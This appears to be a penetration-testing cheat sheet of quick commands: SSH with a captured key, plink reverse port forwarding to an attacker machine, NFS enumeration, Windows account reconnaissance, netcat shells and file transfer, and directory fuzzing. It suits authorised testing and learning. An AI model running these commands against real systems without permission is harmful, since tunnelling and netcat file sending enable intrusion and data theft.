Quick Scripts
Quick Snippets to use in a pinch
SSH
Using a id_rsa to login to a target, Do note you must have the password for the id_rsa for this to work
ssh -i id_rsa User@IPSCP
SCP is a great method of transferring files to and from the target in a pinch
scp User@IP:~/Dir ~/LocalDirscp LocalFile User@IP:~/RemoteDir/FilePLINK
Plink is a tool that's part of the putty suite, it allows for ssh tunneling and in our use cases port forwarding. Once plink is on the target we first find the port we want to forward
netstat -anoand then forward the port to our machine which should have a ssh profile setup
.\plink.exe -l AttackerMachineUserName -pw AttackerMachinePassword -R TargetMachinePort:127.0.0.1:AttackMachinePort AttackMachineIP
.\plink.exe -l hn -pw hn -R 5985:127.0.0.1:5985 10.10.10.10NFS Mounts
NFS Mounts can sometimes be found on targets and can provide essential information about the target
They are often found on port
PORT STATE SERVICE
111/tcp open rpcbindEnumeration
showmount -e IP #List Mounts
nmap -sV --script=nfs-showmount IP #Nmap List Mounts
nmap -sV --script=nfs-statfs IP #Nmap get mount statistics
nmap -sV --script=nfs-ls IP #Nmap list mounts and permissionsLocal Mount
NFS Mounts can also be mounted locally
mount -t nfs IP:/NFSMountName /LocalMountLocation
mount #Lists locally mounted directories
umount IP:/NFSMountName #unmounts mounted NFS DirectoryNFS Mounts can often be huge and take a bit of time to transfer data (especially in a turbulent network) as such it's advisable to use rsync to pull files available on it down
rsync -anv /NFSMountLocation/ /LocalExistingDirPowershell
Powershell Console History
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\Powershell is a very useful and powershell scripting language akin to bash more information about it's utilities can be found on https://docs.microsoft.com/en-us/powershell/module/
CMD
Output file content
type filename.txtOther Useful Commands (these commands work on powershell as well)
dir /a #list files with full atributes including hidden
cmd /k #useful inline with payloads, runs & keeps payload alive
whoami /priv #whoami?
net user #list accounts
net user %USERNAME% #information about current account
net group #view Domain GroupsNetCat
Netcat is tool that allows for simple shells
nc -lnvp IP PORT #start netcat listener
nc IP PORT #use netcat to connect to a defined targetNetcat unfortunately isn't native on windows but we can still get it from https://eternallybored.org/misc/netcat/ and it works the same way!
Netcat can also be used for transferring files
nc -l -p 1234 > out.file #receiver
cat file | nc -w 3 IP PORT #senderFuzzing
Fuzzing is very useful for finding files that has a explicit name but no given explicit location, we can use fuzzing to find the given path using a pre-exisiting URL, fuzzing can also be used for exploiting LFI as well as SQL vulnerabilities
wfuzz -c -w 'wordlist' -u 'http://IP/file.php?id=FUZZ'
ffuf -u http://IP/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc
200,204,301,302,307,401 -o results.txtDirBusting
Dirbusting can be considered a form of fuzzing but checks for whole directories and files, one such tool we can use for this is GoBuster
gobuster dir -u http://IP/ -w DirBuster-Lists/directory-list-2.3-medium.txtPython
Simple Http server for a quick host
python -m SimpleHTTPServer 8088C#
C# binaries can be decompiled with dnspy https://github.com/0xd4d/dnSpy and can be compiled with https://dotnetfiddle.net/
Last updated